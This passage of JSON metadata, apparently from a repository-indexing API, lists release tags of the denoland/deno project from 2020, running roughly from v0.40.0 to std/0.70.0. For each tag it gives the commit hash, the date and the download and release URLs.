f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","publishe